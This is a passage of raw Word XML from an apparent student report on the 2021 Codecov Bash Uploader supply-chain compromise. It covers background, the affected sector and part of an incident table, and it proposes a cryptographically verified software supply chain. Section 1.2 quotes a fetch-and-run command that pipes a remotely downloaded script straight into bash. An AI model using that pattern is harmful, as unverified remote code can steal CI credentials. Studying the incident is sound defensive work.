          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="667" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="516CEAF0"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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E71C43" w:rsidRPr="00F416E0" w14:paraId="3467AD3A"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2A4EAB9C" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">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271A4EB9" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">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74ADAE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DBBFB79"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FAB35F6"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641F28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B0164C1" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">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hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F831FCD" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="256" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F416E0" w:rsidRPr="00F416E0" w14:paraId="2CE76B0C"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5DFCFE77"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4DBB076D"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1B18C587"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05E9939"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6828D6A1"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1BEBDCD"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D8416C0"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1F697CDA"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r w:rsidR="00F416E0" w:rsidRPr="00F416E0" w14:paraId="1B85BB7D"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74B23CB0"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74CF16B5"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7A717D0"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0495C5A"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968E813"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589BF2A6"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1B8AAA9"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547805DC"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bl>
    <w:p w14:paraId="086D54ED" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="006E7149">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="655FCD2E" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="006E7149">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="274F49AF" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27CA8E99" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20CD5D20" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="017A4A6D" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B85FB1C" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DFF2DE6" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7190B5DB" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="579D8293" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50A73085" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38FD4678" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67852F80" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B7C2D65" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65E66B1C" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53A7EEE8" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C851D09" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CD45E0B" w14:textId="77777777" w:rsidR="00F416E0" w:rsidRDefault="00F416E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="463DC3D9" w14:textId="27E810AC" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="005E06C9" w:rsidP="00F416E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:pos="9014" w:val="right"/>
        </w:tabs>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Content</w:t>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Pr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Page No.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8F38E5"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Introduction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73867398"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Abstract</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080D7639"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Problem Statement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077D20AF"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System Requirements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665B80FC"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Design and Implementation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F703237"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Security Analysis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E434CAE"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System Testing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E1B436" w14:textId="38051313"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Innovation and Application Relevance</w:t>
      </w:r>
      <w:r w:rsidR="00F416E0" w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCB3EFA"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Conclusion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3BE1F8" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="00221CB0" w:rsidP="00F416E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="9014" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidSect="00F416E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F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
      <w:r w:rsidR="005E06C9" w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>28</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:after="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CHAPTER 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>INTRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.1 Background</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Modern software is assembled from source code, third-party libraries, build services and helper scripts that run inside CI/CD pipelines. Those pipelines usually hold the most sensitive secrets an organisation has: deployment keys, cloud credentials and API tokens. If any tool that runs inside the pipeline is secretly replaced, the attacker inherits all of those secrets. This is a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>software supply-chain attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, and it bypasses the victim's own defences because the victim runs the malicious code voluntarily.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This CCA studies a documented incident of this kind, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2021 Codecov Bash Uploader compromise</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> [1]. It analyses the threats and vulnerabilities involved, and presents the design, implementation and testing of our prototype, a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Cryptographically Verified Software Supply Chain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>. In our prototype a customer's CI/CD pipeline deploys vendor software only after it has cryptographically verified that the software is unmodified and was released by the trusted vendor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.2 Organisation and Sector</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Codecov is a software-as-a-service provider in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>software development tooling (DevOps) sector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. It reports code coverage, meaning which lines of a program are exercised by automated tests. Customers add Codecov to their CI pipelines. After the tests run, an uploader program sends the coverage report to Codecov. The most common integration was the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bash Uploader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, a shell script that pipelines typically downloaded from Codecov and executed directly (for example </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>bash &lt;(curl -s https://codecov.io/bash)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>). Codecov's GitHub Action, CircleCI Orb and Bitrise Step integrations used the same script [1].</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.3 Incident Context and Date</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 1.1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Incident summary</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Attribute</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Details (documented)</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Organisation / sector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Codecov: code-coverage SaaS, DevOps tooling</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Incident type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Software supply-chain compromise: unauthorised modification of a distributed script</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Compromised component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Bash Uploader, and the integrations that used it (GitHub Action, CircleCI Orb, Bitrise Step)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Period</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Periodic unauthorised alterations starting </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>31 January 2021</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserv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Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1 April 2021</w:t>
            </w:r>
            <w:r>
              <w:rPr>
